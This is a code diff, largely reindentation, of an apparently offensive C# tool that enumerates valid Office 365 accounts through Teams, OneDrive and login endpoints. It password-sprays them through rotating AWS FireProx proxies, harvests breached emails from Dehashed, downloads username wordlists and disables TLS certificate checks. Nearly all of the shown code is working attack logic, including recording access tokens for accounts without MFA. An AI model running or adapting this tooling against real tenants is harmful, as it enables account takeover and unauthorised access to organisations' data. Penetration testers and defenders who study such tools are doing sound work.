+		public static async Task<bool> ValidUserWrapperTeams(TeamsHandler teamsHandler, string username, string enumUserUrl)
+		{
+			try
+			{
+
+				//TODO: Should probably make it so that it does not re-enum invalid accounts
+				var validUser = await teamsHandler.EnumUser(username, enumUserUrl);
+
+
+				if (validUser.isValid && !string.IsNullOrEmpty(validUser.objectId))
+				{
+					//check list and add
+					if (!_teamsObjectIds.Contains(validUser.objectId))
+					{
+						if (!string.IsNullOrEmpty(validUser.Outofofficenote?.message))
+							_databaseHandle.WriteLog(new Log("ENUM", $"{username} valid (OutOfOffice message found)!", ""));
+						else
+							_databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
+
+						try
+						{
+							_databaseHandle.WriteValidAcc(new ValidAccount()
+							{
+								Username = username,
+								Id = Helpers.Generic.StringToGUID(username).ToString(),
+								objectId = validUser.objectId,
+								DisplayName = (validUser.responseObject != null) ? validUser.responseObject?.displayName : "",
+								OutOfOfficeMessage = (validUser.Outofofficenote != null) ? validUser.Outofofficenote.message : "",
+							}
+
+
+							);
+							return true;
+						}
+						catch (Exception ex)
+						{
+
+							//LiteDB needs to fix their crap
+							return false;
+						}
+
+					}
+					else
+					{
+						_databaseHandle.WriteLog(new Log("ENUM", $"{username} valid, but duplicate", ""));
+					}
+				}
+				else if (validUser.isValid && string.IsNullOrEmpty(validUser.objectId))
+				{
+					_databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
+
+					try
+					{
+						_databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = validUser.objectId });
+						return true;
+					}
+					catch (Exception)
+					{
+						return false;
+						//LiteDB needs to fix their crap
+					}
+				}
 
-                return false;
-            }
-            catch (Exception ex)
-            {
-                _databaseHandle.WriteLog(new Log("ENUM", $"Failed to enum {username}, error: {ex}", ""));
-                return false;
+				return false;
+			}
+			catch (Exception ex)
+			{
+				_databaseHandle.WriteLog(new Log("ENUM", $"Failed to enum {username}, error: {ex}", ""));
+				return false;
 
-            }
-        }
-        public static async Task<bool> CheckO365Method(MSOLHandler msolHandler, string domain, string url)
-        {
-            var randomUsername = Guid.NewGuid().ToString().Replace("-", "") + domain;
+			}
+		}
+		public static async Task<bool> CheckO365Method(MSOLHandler msolHandler, string domain, string url)
+		{
+			var randomUsername = Guid.NewGuid().ToString().Replace("-", "") + domain;
 
-            var getUserRealmResult = await Helpers.Generic.CheckUserRealm(randomUsername, _globalProperties);
+			var getUserRealmResult = await Helpers.Generic.CheckUserRealm(randomUsername, _globalProperties);
 
-            if (getUserRealmResult.ThirdPartyAuth == false && getUserRealmResult.Adfs == false)
-                return true;
-            return false;
-        }
-        public static async Task<bool> ValidUserWrapperLogin(MSOLHandler msolHandler, string username, string tempPassword, string fireProxHolder)
-        {
+			if (getUserRealmResult.ThirdPartyAuth == false && getUserRealmResult.Adfs == false)
+				return true;
+			return false;
+		}
+		public static async Task<bool> ValidUserWrapperLogin(MSOLHandler msolHandler, string username, string tempPassword, string fireProxHolder)
+		{
 
 
-            var rescHolder = Helpers.Generic.RandomO365Res();
+			var rescHolder = Helpers.Generic.RandomO365Res();
 
-            var sprayAttempt = new SprayAttempt()
-            {
-                Username = username,
-                Password = tempPassword,
-                FireProxURL = fireProxHolder,
-                FireProxRegion = fireProxHolder.Split('.')[2].Split('.')[0],
-                ResourceClientId = rescHolder.clientId,
-                ResourceUri = rescHolder.Uri
-            };
+			var sprayAttempt = new SprayAttempt()
+			{
+				Username = username,
+				Password = tempPassword,
+				FireProxURL = fireProxHolder,
+				FireProxRegion = fireProxHolder.Split('.')[2].Split('.')[0],
+				ResourceClientId = rescHolder.clientId,
+				ResourceUri = rescHolder.Uri
+			};
 
 
-            var loginResp = await msolHandler.LoginAttemptFireProx(username, tempPassword, fireProxHolder, rescHolder, true);
+			var loginResp = await msolHandler.LoginAttemptFireProx(username, tempPassword, fireProxHolder, rescHolder, true);
 
-            if (!string.IsNullOrWhiteSpace(loginResp.bearerToken?.access_token))
-            {
-                _databaseHandle.WriteLog(new Log("ENUM", $"{username} => VALID NO MFA!"));
-                _databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
-                sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
-                sprayAttempt.Valid = true;
+			if (!string.IsNullOrWhiteSpace(loginResp.bearerToken?.access_token))
+			{
+				_databaseHandle.WriteLog(new Log("ENUM", $"{username} => VALID NO MFA!"));
+				_databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
+				sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
+				sprayAttempt.Valid = true;
 
-            }
-            else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description))
-            {
-                var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
-                var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
+			}
+			else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description))
+			{
+				var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
+				var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
 
-                //Set a default response
-                var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
+				//Set a default response
+				var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
 
-                //Try to parse
-                Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
+				//Try to parse
+				Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
 
-                if (!errorCodeOut.disqualified)
-                {
-                    if (errorCodeOut.valid)
-                    {
-                        _databaseHandle.WriteLog(new Log("ENUM", $"{username} => {errorCodeOut.msg}"));
-                        _databaseHandle.WriteInvalidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = "" });
-                    }
-                    else
-                    {
-                        _databaseHandle.WriteLog(new Log("ENUM", $"{username} => VALID"));
-                        _databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
-                    }
-                }
+				if (!errorCodeOut.disqualified)
+				{
+					if (errorCodeOut.valid)
+					{
+						_databaseHandle.WriteLog(new Log("ENUM", $"{username} => {errorCodeOut.msg}"));
+						_databaseHandle.WriteInvalidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = "" });
+					}
+					else
+					{
+						_databaseHandle.WriteLog(new Log("ENUM", $"{username} => VALID"));
+						_databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
+					}
+				}
 
-                sprayAttempt.ResponseCode = respCode;
-                sprayAttempt.Valid = errorCodeOut.valid;
-                sprayAttempt.Disqualified = errorCodeOut.disqualified;
-                sprayAttempt.ConditionalAccess = errorCodeOut.accessPolicy;
+				sprayAttempt.ResponseCode = respCode;
+				sprayAttempt.Valid = errorCodeOut.valid;
+				sprayAttempt.Disqualified = errorCodeOut.disqualified;
+				sprayAttempt.ConditionalAccess = errorCodeOut.accessPolicy;
 
 
 
 
-            }
+			}
 
-            _databaseHandle.WriteSprayAttempt(sprayAttempt, _globalProperties);
+			_databaseHandle.WriteSprayAttempt(sprayAttempt, _globalProperties);
 
 
-            return false;
-        }
+			return false;
+		}
 
-        public static async Task ValidUserWrapperOneDrive(OneDriveEnumHandler oneDriveEnumHandler, string username)
-        {
+		public static async Task ValidUserWrapperOneDrive(OneDriveEnumHandler oneDriveEnumHandler, string username)
+		{
 
 
 
-            var validUser = await oneDriveEnumHandler.ValidateO365Account(username);
-            if (validUser)
-            {
-                _databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
+			var validUser = await oneDriveEnumHandler.ValidateO365Account(username);
+			if (validUser)
+			{
+				_databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
 
-                _databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
+				_databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
 
-            }
-            else if (!validUser)
-            {
-                //User is not valid, let's note that down
-                _databaseHandle.WriteInvalidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = "" });
-            }
+			}
+			else if (!validUser)
+			{
+				//User is not valid, let's note that down
+				_databaseHandle.WriteInvalidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = "" });
+			}
 
 
-        }
-        public static async Task ValidUserWrapperO365(MSOLHandler msolHandler, string username, string url)
-        {
+		}
+		public static async Task ValidUserWrapperO365(MSOLHandler msolHandler, string username, string url)
+		{
 
-            var validUser = await msolHandler.ValidateO365Account(username, url, true);
-            if (validUser)
-            {
-                _databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
+			var validUser = await msolHandler.ValidateO365Account(username, url, true);
+			if (validUser)
+			{
+				_databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
 
-                _databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
+				_databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString() });
 
-            }
-            else if (!validUser)
-            {
-                //User is not valid, let's note that down
-                _databaseHandle.WriteInvalidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = "" });
-            }
+			}
+			else if (!validUser)
+			{
+				//User is not valid, let's note that down
+				_databaseHandle.WriteInvalidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = "" });
+			}
 
-        }
-        public static async Task EnumerateAsync(string[] args)
-        {
-
-            _databaseHandle = new DatabaseHandler(args);
-
-            _globalProperties = new Handlers.GlobalArgumentsHandler(args, _databaseHandle);
+		}
+		public static async Task EnumerateAsync(string[] args)
+		{
 
-            var usernameListPath = args.GetValue("--usernames");
-
-            var getTenantInfo = args.Contains("--tenant-info");
-
-            var options = new EnumOptions(args);
-
-
-
-            if (options.ValidateAccsLogin == false && options.ValidateAccsO365 == false && options.ValidateAccsTeams == false && options.Dehashed == false && getTenantInfo == false && options.ValidateAccsOneDrive == false)
-            {
-                _databaseHandle.WriteLog(new Log("[+]", $"Please select an validation options! (eg --validate-teams) ", ""));
-                Environment.Exit(0);
-            }
-
-            string domain = "";
-            var msolHandler = new MSOLHandler(_globalProperties, "ENUM", _databaseHandle);
-            var userListData = new string[] { };
-
-            if (!string.IsNullOrEmpty(usernameListPath))
-            {
-                var usernameLines = File.ReadAllLines(usernameListPath);
-                if (usernameLines.Count() > 0)
-                {
-                    userListData = usernameLines.Select(x => x.Trim().ToLower()).Distinct().ToArray();
-                    if (!userListData.FirstOrDefault().Contains("@"))
-                    {
-                        _databaseHandle.WriteLog(new Log("[+]", $"The username list provided needs to be in the format username@company.com!", ""));
-                        Environment.Exit(0);
-
-                    }
-                    domain = userListData.FirstOrDefault().Split("@")[1];
-                }
-                else
-                {
-                    _databaseHandle.WriteLog(new Log("[!]", $"Usernames list provided is emtpy!", ""));
-                    Environment.Exit(0);
-                }
-            }
-            else if (options.Dehashed && args.Contains("--domain"))
-            {
-
-                var dehashedHandler = new DehashedHandler(_globalProperties);
-
-                var dehashedData = await dehashedHandler.FetchDomainEntries(args.GetValue("--domain"));
-
-                if(dehashedData.total == 0)
-                {
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Dehashed search returned no results!", ""));
-                    Environment.Exit(0);
-                }
-                    
-
-                var validEmailAccounts = dehashedData.entries.Select(x => x.email.FirstOrDefault()).Distinct().Where(a => Helpers.Generic.IsValidEmail(a));
-                foreach (var email in validEmailAccounts)
-                {
-                    _databaseHandle.WriteLog(new Log("ENUM", $"{email} valid!", ""));
-                    _databaseHandle.WriteValidAcc(new ValidAccount() { Username = email, Id = Helpers.Generic.StringToGUID(email).ToString(), objectId = "" });
-
-                }
-
-                _databaseHandle.WriteLog(new Log("ENUM", $"Added {validEmailAccounts.Count()} emails from Dehashed to Database as valid accounts", ""));
-                Environment.Exit(0);
-
-            }
-            else if (args.Contains("--domain"))
-            {
-
-                domain = args.GetValue("--domain");
-
-                //To avoid SSL errors
-                var httpClientHandler = new HttpClientHandler
-                {
-                    ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) =>
-                    {
-                        return true;
-                    },
-                    SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls
-                };
-
-
-            startSelection:
-                using (var httpClient = new HttpClient(httpClientHandler))
-                {
-                    var gitHubDict = new Dictionary<int, string>() { };
-
-                    gitHubDict.Add(1, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/john.smith.txt");
-                    gitHubDict.Add(2, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/john.txt");
-                    gitHubDict.Add(3, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/johnjs.txt");
-                    gitHubDict.Add(4, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/johns.txt");
-                    gitHubDict.Add(5, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/johnsmith.txt");
-                    gitHubDict.Add(6, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/jsmith.txt");
-                    gitHubDict.Add(7, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/smith.txt");
-                    gitHubDict.Add(8, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/smithj.txt");
-                    gitHubDict.Add(9, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/john_smith.txt");
-                    gitHubDict.Add(10, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/j.smith.txt");
-                    gitHubDict.Add(11, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/smithjj.txt");
-
-
-                    foreach (var usernameDict in gitHubDict)
-                    {
-                        Console.WriteLine($"    |=> [{usernameDict.Key}] " + usernameDict.Value.Split(@"/")[6].Replace(".txt", "@" + domain));
-                    }
-                    Console.WriteLine();
-                    Console.Write("[?] Select an email format #> ");
-                    int selection = 0;
-                    try
-                    {
-                        selection = Convert.ToInt32(Console.ReadLine());
-                    }
-                    catch (Exception ex)
-                    {
-
-                        Console.WriteLine("[!] Failed to parse input / selection, try again!");
-                        Console.WriteLine("");
-                        goto startSelection;
-                    }
-
-                    var userListReq = await httpClient.PollyGetAsync(gitHubDict.GetValueOrDefault(selection));
-                    if (userListReq.IsSuccessStatusCode)
-                    {
-                        var userListContent = await userListReq.Content.ReadAsStringAsync();
-                        userListData = (userListContent).Split("\n").Where(x => !string.IsNullOrEmpty(x)).Select(x => x + $"@{domain}").ToArray();
-                    }
-                    else
-                    {
-                        Console.WriteLine("[!] Failed to download statistically-likely-usernames from Github!");
-                        Environment.Exit(0);
-                    }
-                }
-
-            }
-
-            if (getTenantInfo)
-            {
-                try
-                {
-
-                    UserRealmLoginResp getUserRealm = await msolHandler.GetUserRealm("randomuser@" + domain);
-                    Console.WriteLine($"[+] Tenant Brand: {getUserRealm.FederationBrandName}");
-                    GetOpenIdConfigResp openIdConfig = await msolHandler.GetOpenIdConfig(domain);
-                    //  Console.WriteLine($"Tenant Name: {}");
-                    Console.WriteLine($"[+] Tenant Id: {openIdConfig.authorization_endpoint.Split("/")[3]}");
-                    Console.WriteLine($"[+] Tenant region: {openIdConfig.tenant_region_scope}");
-                    Envelope outlookAutoDiscover = await msolHandler.GetOutlookAutodiscover(domain);
-                    var tenantDomains = outlookAutoDiscover.Body.GetFederationInformationResponseMessage.Response.Domains;
-                    Console.WriteLine($"[+] Enumerating {tenantDomains.Count()} Tenant Domains:");
-
-                    List<UserRealmLoginResp> userRealmLoginRespList = new List<UserRealmLoginResp>();
-
-                    //Setup the progressBar
-                    int conversationCount = 0;
-                    int totalConversationCount = tenantDomains.Count();
-                    using (var progress = new ProgressBar())
-                    {
-                        foreach (var tenantDomain in outlookAutoDiscover.Body.GetFederationInformationResponseMessage.Response.Domains)
-                        {
-                            UserRealmLoginResp bufferGetUserRealm = await msolHandler.GetUserRealm("randomuser@" + tenantDomain);
-                            userRealmLoginRespList.Add(bufferGetUserRealm);
-                            conversationCount++;
-                            progress.Report((double)conversationCount / totalConversationCount);
+			_databaseHandle = new DatabaseHandler(args);
 
-                        }
+			_globalProperties = new Handlers.GlobalArgumentsHandler(args, _databaseHandle);
 
+			var usernameListPath = args.GetValue("--usernames");
 
-                    }
-                    Console.WriteLine($"[+] Tenant Domains:");
-                    ConsoleTable.From<UserRealmLoginRespPretty>(userRealmLoginRespList.Select(x => (UserRealmLoginRespPretty)x)).Configure(o => o.NumberAlignment = Alignment.Right).Write(Format.Alternative);
-
-                }
-                catch (Exception ex)
-                {
+			var getTenantInfo = args.Contains("--tenant-info");
 
-                    Console.WriteLine("[!] Failed to complete tenant enumeration");
-                }
-            }
+			var options = new EnumOptions(args);
+
+
+
+			if (options.ValidateAccsLogin == false && options.ValidateAccsO365 == false && options.ValidateAccsTeams == false && options.Dehashed == false && getTenantInfo == false && options.ValidateAccsOneDrive == false)
+			{
+				_databaseHandle.WriteLog(new Log("[+]", $"Please select an validation options! (eg --validate-teams) ", ""));
+				Environment.Exit(0);
+			}
+
+			string domain = "";
+			var msolHandler = new MSOLHandler(_globalProperties, "ENUM", _databaseHandle);
+			var userListData = new string[] { };
+
+			if (!string.IsNullOrEmpty(usernameListPath))
+			{
+				var usernameLines = File.ReadAllLines(usernameListPath);
+				if (usernameLines.Count() > 0)
+				{
+					userListData = usernameLines.Select(x => x.Trim().ToLower()).Distinct().ToArray();
+					if (!userListData.FirstOrDefault().Contains("@"))
+					{
+						_databaseHandle.WriteLog(new Log("[+]", $"The username list provided needs to be in the format username@company.com!", ""));
+						Environment.Exit(0);
+
+					}
+					domain = userListData.FirstOrDefault().Split("@")[1];
+				}
+				else
+				{
+					_databaseHandle.WriteLog(new Log("[!]", $"Usernames list provided is emtpy!", ""));
+					Environment.Exit(0);
+				}
+			}
+			else if (options.Dehashed && args.Contains("--domain"))
+			{
+
+				var dehashedHandler = new DehashedHandler(_globalProperties);
+
+				var dehashedData = await dehashedHandler.FetchDomainEntries(args.GetValue("--domain"));
+
+				if (dehashedData.total == 0)
+				{
+					_databaseHandle.WriteLog(new Log("ENUM", $"Dehashed search returned no results!", ""));
+					Environment.Exit(0);
+				}
+
+
+				var validEmailAccounts = dehashedData.entries.Select(x => x.email.FirstOrDefault()).Distinct().Where(a => Helpers.Generic.IsValidEmail(a));
+				foreach (var email in validEmailAccounts)
+				{
+					_databaseHandle.WriteLog(new Log("ENUM", $"{email} valid!", ""));
+					_databaseHandle.WriteValidAcc(new ValidAccount() { Username = email, Id = Helpers.Generic.StringToGUID(email).ToString(), objectId = "" });
+
+				}
+
+				_databaseHandle.WriteLog(new Log("ENUM", $"Added {validEmailAccounts.Count()} emails from Dehashed to Database as valid accounts", ""));
+				Environment.Exit(0);
+
+			}
+			else if (args.Contains("--domain"))
+			{
+
+				domain = args.GetValue("--domain");
+
+				//To avoid SSL errors
+				var httpClientHandler = new HttpClientHandler
+				{
+					ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) =>
+					{
+						return true;
+					},
+					SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls
+				};
+
+
+			startSelection:
+				using (var httpClient = new HttpClient(httpClientHandler))
+				{
+					var gitHubDict = new Dictionary<int, string>() { };
+
+					gitHubDict.Add(1, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/john.smith.txt");
+					gitHubDict.Add(2, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/john.txt");
+					gitHubDict.Add(3, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/johnjs.txt");
+					gitHubDict.Add(4, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/johns.txt");
+					gitHubDict.Add(5, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/johnsmith.txt");
+					gitHubDict.Add(6, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/jsmith.txt");
+					gitHubDict.Add(7, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/smith.txt");
+					gitHubDict.Add(8, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/smithj.txt");
+					gitHubDict.Add(9, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/john_smith.txt");
+					gitHubDict.Add(10, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/j.smith.txt");
+					gitHubDict.Add(11, "https://raw.githubusercontent.com/Flangvik/statistically-likely-usernames/master/smithjj.txt");
+
+
+					foreach (var usernameDict in gitHubDict)
+					{
+						Console.WriteLine($"    |=> [{usernameDict.Key}] " + usernameDict.Value.Split(@"/")[6].Replace(".txt", "@" + domain));
+					}
+					Console.WriteLine();
+					Console.Write("[?] Select an email format #> ");
+					int selection = 0;
+					try
+					{
+						selection = Convert.ToInt32(Console.ReadLine());
+					}
+					catch (Exception ex)
+					{
+
+						Console.WriteLine("[!] Failed to parse input / selection, try again!");
+						Console.WriteLine("");
+						goto startSelection;
+					}
+
+					var userListReq = await httpClient.PollyGetAsync(gitHubDict.GetValueOrDefault(selection));
+					if (userListReq.IsSuccessStatusCode)
+					{
+						var userListContent = await userListReq.Content.ReadAsStringAsync();
+						userListData = (userListContent).Split("\n").Where(x => !string.IsNullOrEmpty(x)).Select(x => x + $"@{domain}").ToArray();
+					}
+					else
+					{
+						Console.WriteLine("[!] Failed to download statistically-likely-usernames from Github!");
+						Environment.Exit(0);
+					}
+				}
+
+			}
+
+			if (getTenantInfo)
+			{
+				try
+				{
 
+					UserRealmLoginResp getUserRealm = await msolHandler.GetUserRealm("randomuser@" + domain);
+					Console.WriteLine($"[+] Tenant Brand: {getUserRealm.FederationBrandName}");
+					GetOpenIdConfigResp openIdConfig = await msolHandler.GetOpenIdConfig(domain);
+					//  Console.WriteLine($"Tenant Name: {}");
+					Console.WriteLine($"[+] Tenant Id: {openIdConfig.authorization_endpoint.Split("/")[3]}");
+					Console.WriteLine($"[+] Tenant region: {openIdConfig.tenant_region_scope}");
+					Envelope outlookAutoDiscover = await msolHandler.GetOutlookAutodiscover(domain);
+					var tenantDomains = outlookAutoDiscover.Body.GetFederationInformationResponseMessage.Response.Domains;
+					Console.WriteLine($"[+] Enumerating {tenantDomains.Count()} Tenant Domains:");
+
+					List<UserRealmLoginResp> userRealmLoginRespList = new List<UserRealmLoginResp>();
 
-            try
-            {
-                if (options.ValidateAccsO365 || options.ValidateAccsTeams || options.ValidateAccsLogin || options.ValidateAccsOneDrive)
-                {
+					//Setup the progressBar
+					int conversationCount = 0;
+					int totalConversationCount = tenantDomains.Count();
+					using (var progress = new ProgressBar())
+					{
+						foreach (var tenantDomain in outlookAutoDiscover.Body.GetFederationInformationResponseMessage.Response.Domains)
+						{
+							UserRealmLoginResp bufferGetUserRealm = await msolHandler.GetUserRealm("randomuser@" + tenantDomain);
+							userRealmLoginRespList.Add(bufferGetUserRealm);
+							conversationCount++;
+							progress.Report((double)conversationCount / totalConversationCount);
 
+						}
 
-                    IEnumerable<string> currentValidAccounts = _databaseHandle.QueryValidAccount().Where(a => a != null).Select(x => x?.Username?.ToLower()).ToList();
-                    IEnumerable<string> currentInvalidAccounts = _databaseHandle.QueryInvalidAccount().Select(x => x.Username.ToLower()).ToList();
 
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Filtering out previusly attempted accounts", ""));
+					}
+					Console.WriteLine($"[+] Tenant Domains:");
+					ConsoleTable.From<UserRealmLoginRespPretty>(userRealmLoginRespList.Select(x => (UserRealmLoginRespPretty)x)).Configure(o => o.NumberAlignment = Alignment.Right).Write(Format.Alternative);
 
-                    userListData = userListData.Except(currentValidAccounts).ToArray();
-                    userListData = userListData.Except(currentInvalidAccounts).ToArray();
+				}
+				catch (Exception ex)
+				{
 
-                    if (userListData.Count() == 0)
-                    {
-                        _databaseHandle.WriteLog(new Log("ENUM", $"No valid accounts left after filters applied, exiting..", ""));
-                        Environment.Exit(0);
-                    }
-                }
+					Console.WriteLine("[!] Failed to complete tenant enumeration");
+				}
+			}
 
-                if (options.ValidateAccsO365)
-                {
-                    var approcTime = (int)Math.Round(TimeSpan.FromSeconds((double)userListData.Count() / 50).TotalMinutes);
 
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Warning, this method may give some false positive accounts", ""));
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} possible accounts, this will take ~{approcTime} minutes", ""));
+			try
+			{
+				if (options.ValidateAccsO365 || options.ValidateAccsTeams || options.ValidateAccsLogin || options.ValidateAccsOneDrive)
+				{
 
-                    (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.com", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
 
-                    //Check if this options is possible
-                    if (!domain.StartsWith("@"))
-                    {
-                        domain = "@" + domain;
-                    }
+					IEnumerable<string> currentValidAccounts = _databaseHandle.QueryValidAccount().Where(a => a != null).Select(x => x?.Username?.ToLower()).ToList();
+					IEnumerable<string> currentInvalidAccounts = _databaseHandle.QueryInvalidAccount().Select(x => x.Username.ToLower()).ToList();
 
-                    string url = $"{enumUserUrl.fireProxUrl}common/GetCredentialType";
+					_databaseHandle.WriteLog(new Log("ENUM", $"Filtering out previusly attempted accounts", ""));
 
-                    //This method only works for Tenants were AAD is federating, not adfs or any third party auth
+					userListData = userListData.Except(currentValidAccounts).ToArray();
+					userListData = userListData.Except(currentInvalidAccounts).ToArray();
 
-                    if ((await CheckO365Method(msolHandler, $"{domain}", url)))
-                    {
-                        await userListData.ParallelForEachAsync(
-                            async user =>
-                            {
-                                await ValidUserWrapperO365(msolHandler, user, url);
+					if (userListData.Count() == 0)
+					{
+						_databaseHandle.WriteLog(new Log("ENUM", $"No valid accounts left after filters applied, exiting..", ""));
+						Environment.Exit(0);
+					}
+				}
 
-                            }, maxDegreeOfParallelism: 50);
+				if (options.ValidateAccsO365)
+				{
+					var approcTime = (int)Math.Round(TimeSpan.FromSeconds((double)userListData.Count() / 50).TotalMinutes);
 
+					_databaseHandle.WriteLog(new Log("ENUM", $"Warning, this method may give some false positive accounts", ""));
+					_databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} possible accounts, this will take ~{approcTime} minutes", ""));
 
+					(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.com", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
 
+					//Check if this options is possible
+					if (!domain.StartsWith("@"))
+					{
+						domain = "@" + domain;
+					}
 
-                    }
-                    else
-                    {
-                        _databaseHandle.WriteLog(new Log("ENUM", "O365 validation method unavailable for this tentant, try teams method!"));
+					string url = $"{enumUserUrl.fireProxUrl}common/GetCredentialType";
 
-                    }
+					//This method only works for Tenants were AAD is federating, not adfs or any third party auth
 
+					if ((await CheckO365Method(msolHandler, $"{domain}", url)))
+					{
+						await userListData.ParallelForEachAsync(
+							async user =>
+							{
+								await ValidUserWrapperO365(msolHandler, user, url);
 
-                    await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
-                }
-                else if (options.ValidateAccsTeams)
-                {
-                    if (Helpers.Generic.IsValidEmail(_globalProperties?.TeamFiltrationConfig?.SacrificialO365Username) && !string.IsNullOrEmpty(_globalProperties?.TeamFiltrationConfig?.SacrificialO365Passwords))
-                    {
-                        var approcTime = (int)Math.Round(TimeSpan.FromSeconds(((double)userListData.Count() / 300)).TotalMinutes);
+							}, maxDegreeOfParallelism: 50);
 
-                        _databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} possible accounts, this will take ~{approcTime} minutes", ""));
 
-                        var teamsToken = await msolHandler.LoginAttemptFireProx(
-                            _globalProperties.TeamFiltrationConfig.SacrificialO365Username,
-                            _globalProperties.TeamFiltrationConfig.SacrificialO365Passwords,
-                            _globalProperties.GetBaseUrl(),
 
-                            ("https://api.spaces.skype.com/", "1fec8e78-bce4-4aaf-ab1b-5451cc387264"));
 
-                        if (teamsToken.bearerToken != null)
-                        {
+					}
+					else
+					{
+						_databaseHandle.WriteLog(new Log("ENUM", "O365 validation method unavailable for this tentant, try teams method!"));
 
-                            _databaseHandle.WriteLog(new Log("ENUM", $"Successfully got Teams token for sacrificial account", ""));
+					}
 
-                            TeamsHandler teamsHandler = new TeamsHandler(teamsToken.bearerToken, _globalProperties);
 
-                            //Pull out objectId's
-                            var previusValidAccs = _databaseHandle.QueryValidAccount();
-                            if (previusValidAccs.Count() > 0)
-                            {
-                                _teamsObjectIds = previusValidAccs?.Select(x => x?.objectId).ToList();
-                            }
+					// await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
+				}
+				else if (options.ValidateAccsTeams)
+				{
+					if (Helpers.Generic.IsValidEmail(_globalProperties?.TeamFiltrationConfig?.SacrificialO365Username) && !string.IsNullOrEmpty(_globalProperties?.TeamFiltrationConfig?.SacrificialO365Passwords))
+					{
+						var approcTime = (int)Math.Round(TimeSpan.FromSeconds(((double)userListData.Count() / 300)).TotalMinutes);
